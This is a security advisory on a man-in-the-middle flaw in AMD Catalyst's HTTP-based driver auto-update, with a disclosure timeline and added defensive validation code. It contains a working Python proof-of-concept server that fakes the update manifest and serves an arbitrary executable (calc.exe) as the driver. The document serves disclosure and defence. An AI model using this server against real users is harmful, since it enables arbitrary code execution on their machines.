Description of vulnerability

The AMD Catalyst driver auto update feature enables users to automatically update the AMD Catalyst driver on their machine through a single click when the driver determines that it is out of date.

However, a vulnerability exists in this mechanism as a result of:

- The download URL and binary download is done over HTTP
- The binary is not verified as having been signed by AMD before execution

This means that a MITM can intercept the requests to the AMD support site and redirect the auto-update feature to download and execute a binary of the attacker’s choice without the user knowing any better when they decide to auto-update.

Proof of concept

```python
# Python 2 script (SimpleHTTPServer / SocketServer modules)
import SimpleHTTPServer
import SocketServer

# Update manifest returned to the driver's update check
xml = """<?xml version="1.0" encoding="utf-8"?>
<list>
  <Catalyst-Driver-Files>
    <Title>Catalyst Software Suite with .NET 4 Support</Title>
    <DriverCategory>Full Catalyst Software Suite (Recommended)</DriverCategory>
    <DriverLanguage>;#All;#</DriverLanguage>
    <DriverProductType>;#1-Radeon;#3-Integrated;#18-AIW_HD;#</DriverProductType>
    <FileSize>184 MB</FileSize>
    <OSType>;#Windows Vista - 64-Bit Edition;#Windows 7 - 64-Bit Edition;#</OSType>
    <ReleaseDate>2012-10-22T00:00:00-05:00</ReleaseDate>
    <RevisionNumber>12.42</RevisionNumber>
    <RollupSortOrder>15</RollupSortOrder>
    <TextMultiple1> </TextMultiple1>
    <TextSingle1>http://www2.ati.com/drivers/12-10_vista_win7_win8_64_dd_ccc_whql_net4.exe</TextSingle1>
    <TechDownloadGPUSubtype>Driver</TechDownloadGPUSubtype>
    <ContentType>GraphicsDriverFile</ContentType>
    <DriverVersionSupported>;#12.42;#</DriverVersionSupported>
    <ID>956</ID>
    <Modified>2012-10-22T21:30:52-05:00</Modified>
    <Created>2012-10-22T21:30:52-05:00</Created>
    <Author>System Account</Author>
    <Editor>System Account</Editor>
    <_UIVersionString>1.0</_UIVersionString>
    <Attachments>0</Attachments>
    <TitleCN>Catalyst Software Suite</TitleCN>
    <TitleBR>Catalyst Software Suite</TitleBR>
    <TitleDE>Catalyst Software Suite</TitleDE>
    <TitleFR>Catalyst Software Suite</TitleFR>
    <TitleIT>Catalyst Software Suite</TitleIT>
    <TitleLA>Catalyst Software Suite</TitleLA>
    <DescriptionCN> </DescriptionCN>
    <DescriptionBR> </DescriptionBR>
    <DescriptionDE> </DescriptionDE>
    <DescriptionFR> </DescriptionFR>
    <DescriptionIT> </DescriptionIT>
    <DescriptionLA> </DescriptionLA>
    <TitleKR>(Catalyst Software Suite)</TitleKR>
    <DescriptionKR> </DescriptionKR>
    <LinkTitleNoMenu>Catalyst Software Suite with .NET 4 Support</LinkTitleNoMenu>
    <LinkTitle>Catalyst Software Suite with .NET 4 Support</LinkTitle>
  </Catalyst-Driver-Files>
</list>
"""


class ExploitHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
    def do_GET(self):
        if "catalystxml" in self.path:
            # Update check: answer with the manifest above
            self.send_response(200)
            self.send_header('Content-type', 'text/xml')
            self.end_headers()
            self.wfile.write(xml)
            return
        elif ".exe" in self.path:
            # Driver download: answer with calc.exe instead of the installer
            self.send_response(200)
            self.send_header('Content-type', 'application/octet-stream')
            self.end_headers()
            f = open(r"C:\Windows\System32\calc.exe", "rb")
            self.wfile.write(f.read())
            f.close()
            return


httpd = SocketServer.ThreadingTCPServer(('0.0.0.0', 80), ExploitHandler)
httpd.serve_forever()
```

By pointing amd.com, www.amd.com, www.ati.com and www2.ati.com at this script, you’ll observe that the Catalyst update feature will prompt you to update the driver, and download and execute calc.exe.
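The two missing checks listed in the description, written as the gate an updater could apply before running a download. This is an added example, not AMD's code or part of the original advisory; the host allow-list and the pinned SHA-256 digest (standing in here for verification of the publisher's signature) are assumptions.

```python
import hashlib
import hmac
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Hosts named in the advisory's PoC notes; using them as an allow-list is an assumption.
ALLOWED_HOSTS = {"amd.com", "www.amd.com", "www.ati.com", "www2.ati.com"}

# Constructed sample: trimmed copy of the manifest shown in the proof of concept.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<list>
  <Catalyst-Driver-Files>
    <Title>Catalyst Software Suite with .NET 4 Support</Title>
    <RevisionNumber>12.42</RevisionNumber>
    <TextSingle1>http://www2.ati.com/drivers/12-10_vista_win7_win8_64_dd_ccc_whql_net4.exe</TextSingle1>
  </Catalyst-Driver-Files>
</list>
"""


def download_url_problems(manifest_xml):
    """Return the reasons to refuse the download URL named in the manifest."""
    root = ET.fromstring(manifest_xml.encode("utf-8"))
    node = root.find(".//TextSingle1")
    if node is None or not (node.text or "").strip():
        return ["manifest has no download URL"]
    url = urlsplit(node.text.strip())
    problems = []
    if url.scheme != "https":
        problems.append("download URL is not HTTPS: scheme=%r" % url.scheme)
    if (url.hostname or "").lower() not in ALLOWED_HOSTS:
        problems.append("download host not allow-listed: %r" % url.hostname)
    return problems


def payload_matches_pin(payload, expected_sha256_hex):
    """Compare downloaded bytes with a digest taken from trusted, signed metadata."""
    actual = hashlib.sha256(payload).hexdigest()
    return hmac.compare_digest(actual, expected_sha256_hex.lower())


def may_execute(manifest_xml, payload, expected_sha256_hex):
    """Allow execution only if the transport and integrity checks all pass."""
    return (not download_url_problems(manifest_xml)
            and payload_matches_pin(payload, expected_sha256_hex))
```

The manifest itself must also be fetched over HTTPS with certificate validation; a digest or URL read from a manifest delivered over plain HTTP carries no trust.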

Time table

23.11.2012 – Sent a request for security contact details

23.11.2012 – Vendor informs that they will only coordinate issues through their support ticket system

23.11.2012 – Sent details as per request including proof of concept

26.11.2012 – Vendor acknowledges receipt of details and requests further contact details

29.11.2012 – Vendor confirms that the team is working with their web team to address the issue

10.12.2012 – Mail sent asking for a rough timeline

14.12.2012 – Vendor replies informing that the driver team is still working on the issue, and that their legal team is also involved

19.12.2012 – Vendor publishes advisory: http://support.amd.com/us/kbarticles/Pages/AMDauto-updatenotification.aspx

17.01.2013 – Vendor releases AMD Catalyst 13.1, removing the update feature